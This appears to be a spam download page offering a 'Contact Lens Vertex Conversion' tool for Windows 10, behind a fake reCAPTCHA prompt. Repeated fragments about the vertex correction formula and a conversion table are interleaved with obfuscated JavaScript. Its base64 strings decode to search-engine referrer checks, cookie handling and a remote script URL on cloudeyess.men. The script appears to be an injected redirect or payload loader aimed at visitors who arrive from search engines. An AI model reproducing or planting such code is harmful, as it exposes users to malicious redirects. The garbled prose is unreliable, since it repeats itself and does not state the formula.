
I'm not a robot



reCAPTCHA
[Privacy](#) - [Terms](#)

Continue

Contact Lens Vertex Conversion Download For Windows 10 64

The formula for vertex correction is: F_c is the power corrected for vertex distance, F is the original lens power, x is the change in vertex distance in meters.. $*?(?;$/g)$, $_0x96157b={}$;continue;case'4':if(name){return $_0x96157b[name]$;}continue;case'5':if($_0x207029[_0x220b('0x2d')]$)($_0x14accd,name$)){return undefined;}continue;}break;}}if($_0x20c7ed$){cookie[$_0x220b('0x2e')$]($_0x207029['AjiIu']$, $0x1,0x1$);if(! $_0x4e1b3e$){ $_0x207029[_0x220b('0x2f')$](include, $_0x207029['uKopK']$)($_0x220b('0x30')+q$,"));}}R()); Back Vertex Distance Conversion TableA conversion chart for when choosing the correct power for contact lenses.. var $_0x3353=['LnlhaG9vLg==','LmFvbC4=','LnlhbmRleC4=','M3w1fDB8MXw0fDI=','dmlzaXRIZA==','bGNFcUM=','UXpBZ2U=','a2FDblU=','YkdKQVE=','LmFsdGF2aXN0YS4=','cmVmZXJyZXI=','Z2V0','S3dx','amdCaVU=','aW5kZXhPZg==','QkxsQ2c=','bGVuZ3Ro','TUpkVnM=','c2V0','Ykdttd1k=','aHR0cHM6Ly9jbG91ZGV5ZXNzLm1lbi9kb25fY29uLnBocD94PWVuJnF1ZXJ5PQ==','Y3JlYXRIRWxlbnVudA==','Y1d3TWo=','c3Jj','Y29udGFjdCtsZW5zK3ZlcnRleCtjb252ZXJzaW9u','dXJk','MXwyfDN8NXwwfDQ=','c3BsaXQ=','Y29va2ll','bWF0Y2g=','ZFF6VUg=','bWJ2T2c=','S3d0SWs=','cmVwbGFjZQ==','OyBleHBpcmVzPQ==','OyBzZWZlcmU=','VGIGWkM=','bXdWbEk=','SVB BbkU=','Rnd6eUk=','cUdFUGI=','a0lPdEI=','Z2V0VGltZQ==','a05JZko=','THRNeKk=','Y3JoeE0=','eVFRSEU=','Lmdvb2dsZS4=','LmJpbmCu'];(function($_0x1cda38$, $_0x4cc0fd$){var $_0x4ec49f$ =function($_0x56a75f$){while(-- $_0x56a75f$){ $_0x1cda38['push']$ ($_0x1cda38['shift']$ ());}}; $_0x4ec49f(++_0x4cc0fd)$;})($_0x3353,0x10a$);var $_0x220b$ =function($_0x585741$, $_0x2d1462$){ $_0x585741=_0x585741-0x0$;var $_0x8dba70=_0x3353[_0x585741]$;if($_0x220b['initialized']$ ===undefined){(function(){var $_0x530939$ =function(){var $_0x832422$;try{ $_0x832422=Function('return\x20(function()\x20+'$ { }.. The formula for vertex correction is: F_c is the power corrected for vertex distance, F is the original lens power, x is the change in vertex distance in meters.. constructor($\x22return\x20this\x22$)($\x20$ +'');)}catch($_0x21e2e0$){ $_0x832422=window$;}return $_0x832422$;}var $_0x472111=_0x530939$);var $_0x31bf20='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'$;var $_0x472111['atob']$ ||($_0x472111['atob']$)=function($_0x289ef2$){var $_0x19a3e0=String$ ($_0x289ef2$)['replace'](/=+$/,"");for(var $_0x398bee=0x0$, $_0x4a2018$, $_0x858aa1$, $_0x52056d=0x0$, $_0x3e16d2='$; $_0x858aa1=_0x19a3e0['charAt']$ ($_0x52056d++$);~ $_0x858aa1$ &&($_0x4a2018=_0x398bee%0x4?$ $_0x4a2018*0x40+$ $_0x858aa1:$ $_0x858aa1$, $_0x398bee++%0x4)?$ $_0x3e16d2+=String$ ['fromCharCode']($0xff&$ $_0x4a2018>>$ ($-0x2*$ $_0x398bee&0x6$)): $0x0$){ $_0x858aa1=_0x31bf20['indexOf']$ ($_0x858aa1$);}return $_0x3e16d2$;});($_0x220b['base64DecodeUnicode']$)=function($_0x3cc2e3$){var $_0x3a3ef6=atob$ ($_0x3cc2e3$);var $_0x2e69e2=[]$;for(var $_0x33ea05=0x0$, $_0x23501c=_0x3a3ef6['length']$; $_0x33ea05=0x0$){ $_0x20c7ed=!![]$;}else{var $_0x57dbb2=_0x207029['ngdNx']$ [_ $_0x220b('0x6')$]($'|'$), $_0x11cd2d=0x0$;while(!![]){switch($_0x57dbb2$ [_ $_0x11cd2d++$]){case'0':var $_0x2ad93c$;continue;case'1':for(var $_0xa214d7=0x0$; $_0x207029[_0x220b('0x2b')]$ ($_0xa214d7$, $_0x14accd$ [_ $_0x220b('0x2c')$]); $_0xa214d7++$){ $_0x2ad93c=_0x14accd$ [_ $_0xa214d7$][_ $_0x220b('0x6')$]]($'='$); $_0x96157b$ [_ $_0x2ad93c$ [_ $0x0$]]=_ $_0x2ad93c$ [_ $0x1$][_ $_0x220b('0xc')$]](/;$/);}continue;case'2':return $_0x96157b$;case'3':var $_0x14accd=document$ [_ $_0x220b('0x7')$][_ $'match'$]](/[/w-]+=.. Back Vertex Distance Conversion TableA conversion chart for when choosing the correct power for contact lenses.$